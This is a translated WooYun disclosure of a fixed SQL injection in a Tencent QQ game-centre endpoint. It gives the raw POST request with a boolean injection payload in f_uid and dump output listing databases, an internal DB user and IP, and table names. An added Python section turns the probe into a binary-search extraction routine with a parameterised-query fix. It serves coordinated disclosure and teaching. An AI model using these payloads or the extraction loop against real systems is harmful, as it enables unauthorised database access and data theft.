Vulnerability summary

Defect ID: wooyun-2015-0121923

Title: SQL injection in a QQ site's MySQL back end (UNION supported)

Vendor: Tencent (腾讯)

Author: lijiejie

Submitted: 2015-06-21 14:27

Fixed: 2015-08-07 10:56

Published: 2015-08-07 10:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-21: Details reported to the vendor; awaiting vendor handling
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-07-03: Details disclosed to core white hats and relevant domain experts
2015-07-13: Details disclosed to regular white hats
2015-07-23: Details disclosed to intern white hats
2015-08-07: Details disclosed to the public

Brief description:

SQL injection in a QQ site's MySQL back end (UNION supported)

Detailed description:

Injection point:

POST /json.php?act=addChannel&dir=&mod=ComponentInfo HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://s.qq.com
Host: s.qq.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
f_channel_name=test&f_uid=-1' OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --


The f_uid parameter is injectable (MySQL; UNION-based injection works). The request above is a boolean probe: the leading -1' closes the single-quoted string literal the parameter lands in, OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 appends a condition on the first character of user(), and the trailing -- comments out the remainder of the original statement, so the response differs depending on whether the appended condition is true or false.
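The following is an added example, not code from the report or from the affected site. It takes the boolean probe shown in the request above, generalises it into a character-by-character extraction loop of the kind that produced the "MySQL user is ..." line in the proof below, and sets it beside the parameterised query that the fix section calls for. Everything runs in-process: the database behind s.qq.com is replaced by a constructed oracle that answers the probes for a constructed user() value, the table name t_channel and the shape of the back-end query (f_uid concatenated inside single quotes) are assumptions, and SQLite stands in for MySQL for the vulnerable-versus-fixed comparison because it cannot evaluate mid()/user().

```python
import re
import sqlite3

# Constructed: the value the real oracle leaked in the report
# ("MySQL user is gamecenter@10.194.147.122"); used only to answer probes here.
SECRET_USER = "gamecenter@10.194.147.122"


def probe_payload(pos: int, op: str, value: int) -> str:
    """Build the MySQL probe from the report, generalised to any character
    position, comparison operator and ASCII value. The leading -1' closes the
    string literal, OR appends our condition, and -- comments out the rest.
    The report's own probe is the pos=1, op='!=', value=123 instance."""
    return f"-1' OR ascii(mid(user() from {pos} for 1)){op}{value} AND 1=1 -- "


_PROBE = re.compile(r"ascii\(mid\(user\(\) from (\d+) for 1\)\)(>|!=|=)(\d+)")


def simulated_oracle(f_uid: str) -> bool:
    """Constructed stand-in for POST /json.php?act=addChannel: returns True
    when the injected WHERE clause would be true for user() = SECRET_USER.
    In MySQL, mid() past the end of the string yields '' and ascii('') is 0."""
    m = _PROBE.search(f_uid)
    if not m:
        return False
    pos, op, value = int(m.group(1)), m.group(2), int(m.group(3))
    ch = ord(SECRET_USER[pos - 1]) if pos <= len(SECRET_USER) else 0
    return {">": ch > value, "!=": ch != value, "=": ch == value}[op]


def extract_user(oracle, max_len: int = 64) -> str:
    """Recover user() one character at a time with a binary search over the
    ASCII range: about 7 requests per character instead of up to 127."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            guess = (lo + hi) // 2
            if oracle(probe_payload(pos, ">", guess)):
                lo = guess + 1
            else:
                hi = guess
        if lo == 0:  # ascii('') == 0: we are past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


def channel_lookup(f_uid: str, parameterised: bool) -> int:
    """Assumed shape of the vulnerable lookup, run against an in-memory SQLite
    table (constructed rows) so both variants execute here. Returns the number
    of rows matched; SQLite lacks mid()/user(), so a tautology payload is used."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE t_channel (f_uid TEXT, f_channel_name TEXT)")
    db.executemany("INSERT INTO t_channel VALUES (?, ?)",
                   [("1", "alpha"), ("2", "beta"), ("3", "gamma")])
    if parameterised:
        # Fix: the value travels as a bound parameter, never as SQL text.
        cur = db.execute("SELECT count(*) FROM t_channel WHERE f_uid = ?", (f_uid,))
    else:
        # Vulnerable: the value is spliced into the statement verbatim.
        cur = db.execute(f"SELECT count(*) FROM t_channel WHERE f_uid = '{f_uid}'")
    return cur.fetchone()[0]


if __name__ == "__main__":
    # The report's probe: 'g' is 103, not 123, so the appended clause is true.
    print(simulated_oracle(probe_payload(1, "!=", 123)))  # True
    print(extract_user(simulated_oracle))  # gamecenter@10.194.147.122
    tautology = "-1' OR 1=1 -- "
    print(channel_lookup(tautology, parameterised=False))  # 3: every row matches
    print(channel_lookup(tautology, parameterised=True))   # 0: no such f_uid
```

The `>` comparison is what makes the binary search work; the report's `!=123` form is only a quick yes/no check that the parameter is injectable, since almost any first character satisfies it. Against the real endpoint, `simulated_oracle` would be replaced by a function that sends the POST and classifies the JSON response, and each character would cost roughly seven requests.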

Proof of vulnerability:

available databases [6]:
[*] db_game_center
[*] db_game_center_pre
[*] db_gamecenter_app
[*] information_schema
[*] mysql
[*] test


[Done] MySQL user is gamecenter@10.194.147.122
Current db is db_gamecenter_app


Database: db_gamecenter_app
[65 tables]
+----------------------------------------------+
| t_activity_book_cdkey |
| t_activity_book_info |
| t_activity_download_info |
| t_ad_info |
| t_ad_info_20150613 |
| t_ad_location_info |
| t_app_update_check_info |
| t_business_config |
| t_business_field_config |
| t_channel_game_info |
| t_game_base_lists |
| t_game_black_list |
| t_game_broadcast_auto_info |
| t_game_broadcast_manual_info |
| t_game_category_info |
| t_game_channel |
| t_game_giftparam |
| t_game_history_popular_list |
| t_game_history_ranking_list |
| t_game_id_map |
| t_game_info |
| t_game_info_check40 |
| t_game_info_tmp |
| t_game_label |
| t_game_label_info |
| t_game_must_play_category_game_info |
| t_game_must_play_category_info |
| t_game_order_info |
| t_game_popular_list |
| t_game_ranking_list |
| t_game_rating |
| t_gameorder_hiddenrule |
| t_gift |
| t_gift_record |
| t_id_config |
| t_id_config_20150603 |
| t_ios_game_info |
| t_ios_game_list |
| t_main_record |
| t_mga_auto_id |
| t_mga_channel |
| t_mga_channel_game |
| t_mga_game |
| t_mga_original_game_list |
| t_mga_user |
| t_mga_user_white_list |
| t_operation_log |
| t_package_name |
| t_player_recommand_info |
| t_recommend_category |
| t_recommend_hotword |
| t_search_category_map |
| t_search_log_hotword |
| t_subject_game_info |
| t_subject_info |
| t_sys_msg |
| t_yyb_game_category_list |
| t_yyb_game_category_list_cms |
| t_yyb_game_category_list_cms_all_check_level |
| t_yyb_game_category_specify_position |
| t_yyb_game_category_type |
| t_yyb_game_history_category_list |
| t_yyb_game_specify_position |
| tbArticle4Hall |
| tbGameApk |
+----------------------------------------------+

Fix recommendation:

Filter the parameter: validate f_uid server-side and, better, pass it to the query as a bound parameter instead of concatenating it into the SQL string.

Copyright notice: please credit the source when reposting: lijiejie@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-06-23 10:54

Vendor reply:

Thank you very much for your report. We have started handling the issue, and we thank everyone for their attention to the security of Tencent's services. If you have any questions, feel free to send feedback; a dedicated person will follow up.

Latest status:

None yet